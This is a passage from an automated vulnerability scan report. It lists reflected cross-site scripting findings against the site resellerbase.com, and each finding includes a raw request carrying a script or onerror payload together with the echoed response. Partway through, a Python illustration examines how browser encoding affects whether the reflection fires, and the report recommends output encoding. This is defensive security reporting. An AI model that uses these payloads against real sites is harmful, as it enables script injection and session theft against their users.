Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:01:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /suggest_category.php1e990<script>alert(1)</script>4dbc159498276f492?captcha_key=555-555-0199@example.com&pflag=send&parent=7&submit=Suggest+Category&cat_name=Peter+Wiener was not found on this server.</p>
...[SNIP]...

2.4162. http://www.resellerbase.com/tag/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d52a5<script>alert(1)</script>651ce569326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd52a5<script>alert(1)</script>651ce569326/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd52a5<script>alert(1)</script>651ce569326/ was not found on this server.</p>
...[SNIP]...

2.4163. http://www.resellerbase.com/tag/Outsource+SEO [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/Outsource+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 779cb<script>alert(1)</script>cfdffc545bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag779cb<script>alert(1)</script>cfdffc545bb/Outsource+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag779cb<script>alert(1)</script>cfdffc545bb/Outsource+SEO was not found on this server.</p>
...[SNIP]...

2.4164. http://www.resellerbase.com/tag/Reseller+SEO [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/Reseller+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12417<script>alert(1)</script>1a80fb4ffa4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag12417<script>alert(1)</script>1a80fb4ffa4/Reseller+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag12417<script>alert(1)</script>1a80fb4ffa4/Reseller+SEO was not found on this server.</p>
...[SNIP]...

2.4165. http://www.resellerbase.com/tag/Resellers+SEO [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/Resellers+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bcee<script>alert(1)</script>bae5a6581c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag1bcee<script>alert(1)</script>bae5a6581c1/Resellers+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1bcee<script>alert(1)</script>bae5a6581c1/Resellers+SEO was not found on this server.</p>
...[SNIP]...

2.4166. http://www.resellerbase.com/tag/SEO+Reseller [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+Reseller

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18462<script>alert(1)</script>767cef018f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag18462<script>alert(1)</script>767cef018f0/SEO+Reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag18462<script>alert(1)</script>767cef018f0/SEO+Reseller was not found on this server.</p>
...[SNIP]...

2.4167. http://www.resellerbase.com/tag/SEO+Resellers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+Resellers

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d71f1<script>alert(1)</script>dac84b73d28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd71f1<script>alert(1)</script>dac84b73d28/SEO+Resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd71f1<script>alert(1)</script>dac84b73d28/SEO+Resellers was not found on this server.</p>
...[SNIP]...

2.4168. http://www.resellerbase.com/tag/SEO+outsourcing [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+outsourcing

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7c58<script>alert(1)</script>472a4cd0810 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga7c58<script>alert(1)</script>472a4cd0810/SEO+outsourcing HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga7c58<script>alert(1)</script>472a4cd0810/SEO+outsourcing was not found on this server.</p>
...[SNIP]...

2.4169. http://www.resellerbase.com/tag/SEO+reseller+program [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+reseller+program

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6f368<script>alert(1)</script>ee0edd6ecf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag6f368<script>alert(1)</script>ee0edd6ecf1/SEO+reseller+program HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6f368<script>alert(1)</script>ee0edd6ecf1/SEO+reseller+program was not found on this server.</p>
...[SNIP]...

2.4170. http://www.resellerbase.com/tag/TGP [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f64f5<script>alert(1)</script>5b94b89158c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf64f5<script>alert(1)</script>5b94b89158c/TGP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf64f5<script>alert(1)</script>5b94b89158c/TGP was not found on this server.</p>
...[SNIP]...

2.4171. http://www.resellerbase.com/tag/TGP [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3e77<script>alert(1)</script>3d4c24d8d5bcf2ce0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagf3e77<script>alert(1)</script>3d4c24d8d5bcf2ce0/TGP?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf3e77<script>alert(1)</script>3d4c24d8d5bcf2ce0/TGP?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...
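
Findings 2.4159 to 2.4171 (and 2.4176 below) all hit the same sink: the application's custom 404 page prints the requested path without encoding it. Before treating these as exploitable by sending a victim a link, a practitioner wants to check something the scanner output does not settle. The scanner put < and > on the wire literally (see the request lines), whereas a browser percent-encodes them in the path, so whether a victim's browser triggers the same reflection depends on whether the page echoes the raw request target (Apache hands that to PHP as REQUEST_URI, undecoded) or a percent-decoded path variable such as PATH_INFO or REDIRECT_URL. The Python below is added here as an illustration and is not code from the report or from resellerbase.com; it models both delivery routes, and the choice of server variable is an assumption the code labels. PAYLOAD_PATH is copied from finding 2.4163.

```python
import html
from urllib.parse import quote, unquote


def render_404(request_uri, escaper):
    """The <p> line of the application's 404 page, for a given output escaper."""
    return "<p>The requested URL %s was not found on this server.</p>" % escaper(request_uri)


def identity(value):
    """No output encoding: what the findings show the page doing today."""
    return value


def as_browser_would_send(path):
    """Approximate how a browser percent-encodes a path before sending it.

    Browsers leave "/", "+", "(", ")" and the other sub-delimiters alone but
    always encode "<", ">", '"', space and non-ASCII; quote()'s safe set is
    chosen to mirror that (an approximation, not a spec transcription).
    """
    return quote(path, safe="/?=&+()'!*:@;,$")


def server_views(wire_path):
    """Two ways a PHP 404 page might obtain the path it echoes.

    Apache passes REQUEST_URI to PHP exactly as it appeared on the wire, while
    path-derived variables such as PATH_INFO or REDIRECT_URL are percent-decoded.
    Which one resellerbase.com prints is not visible in the report (assumption).
    """
    return {"REQUEST_URI": wire_path, "decoded": unquote(wire_path)}


# Scanner payload path copied from finding 2.4163.
PAYLOAD_PATH = "/tag779cb<script>alert(1)</script>cfdffc545bb/Outsource+SEO"
MARKER = "<script>alert(1)</script>"


def demo():
    """Does the marker reach the page as live markup for each delivery path?"""
    scanner_wire = PAYLOAD_PATH                       # Burp sent the characters raw
    browser_wire = as_browser_would_send(PAYLOAD_PATH)
    browser = server_views(browser_wire)
    return {
        "browser_wire": browser_wire,
        "scanner_raw": MARKER in render_404(scanner_wire, identity),
        "browser_via_request_uri": MARKER in render_404(browser["REQUEST_URI"], identity),
        "browser_via_decoded": MARKER in render_404(browser["decoded"], identity),
        "scanner_raw_escaped": MARKER in render_404(scanner_wire, html.escape),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print("%-26s %s" % (case, result))
```

If the page prints REQUEST_URI, a browser-delivered link reflects the percent-encoded form and the script tag never forms, although the scanner's raw request still proves the missing encoding; if it prints a decoded variable, the link works as the scanner suggests. Either way the fix is the same entity encoding at the sink, and the 404 status is no mitigation, since browsers render a text/html body whatever the status code.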

2.4172. http://www.resellerbase.com/tag/TGP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d025d</title><img%20src%3da%20onerror%3dalert(1)>de94b852156 was submitted in the REST URL parameter 2. This input was echoed as d025d</title><img src=a onerror=alert(1)>de94b852156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/TGPd025d</title><img%20src%3da%20onerror%3dalert(1)>de94b852156 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGPd025d</title><img src=a onerror=alert(1)>de94b852156</title>
...[SNIP]...

2.4173. http://www.resellerbase.com/tag/TGP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1172f<img%20src%3da%20onerror%3dalert(1)>f1578696b0c was submitted in the REST URL parameter 2. This input was echoed as 1172f<img src=a onerror=alert(1)>f1578696b0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/TGP1172f<img%20src%3da%20onerror%3dalert(1)>f1578696b0c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGP11
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : TGP1172f<img src=a onerror=alert(1)>f1578696b0c]</td>
...[SNIP]...

2.4174. http://www.resellerbase.com/tag/TGP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52ccf<img%20src%3da%20onerror%3dalert(1)>a251217cc91dcac22 was submitted in the REST URL parameter 2. This input was echoed as 52ccf<img src=a onerror=alert(1)>a251217cc91dcac22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/TGP52ccf<img%20src%3da%20onerror%3dalert(1)>a251217cc91dcac22?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGP52
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : TGP52ccf<img src=a onerror=alert(1)>a251217cc91dcac22]</td>
...[SNIP]...

2.4175. http://www.resellerbase.com/tag/TGP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload aae35</title><img%20src%3da%20onerror%3dalert(1)>e8feb48c5cae2bf0b was submitted in the REST URL parameter 2. This input was echoed as aae35</title><img src=a onerror=alert(1)>e8feb48c5cae2bf0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/TGPaae35</title><img%20src%3da%20onerror%3dalert(1)>e8feb48c5cae2bf0b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGPaae35</title><img src=a onerror=alert(1)>e8feb48c5cae2bf0b</title>
...[SNIP]...

2.4176. http://www.resellerbase.com/tag/VOIP [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4af70<script>alert(1)</script>bfd27bbc562 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4af70<script>alert(1)</script>bfd27bbc562/VOIP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4af70<script>alert(1)</script>bfd27bbc562/VOIP was not found on this server.</p>
...[SNIP]...

2.4177. http://www.resellerbase.com/tag/VOIP [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 806b2<script>alert(1)</script>73f2806784dce2daa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag806b2<script>alert(1)</script>73f2806784dce2daa/VOIP?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag806b2<script>alert(1)</script>73f2806784dce2daa/VOIP?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4178. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload dd45a</title><img%20src%3da%20onerror%3dalert(1)>2472ebc6bb6d0045e was submitted in the REST URL parameter 2. This input was echoed as dd45a</title><img src=a onerror=alert(1)>2472ebc6bb6d0045e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

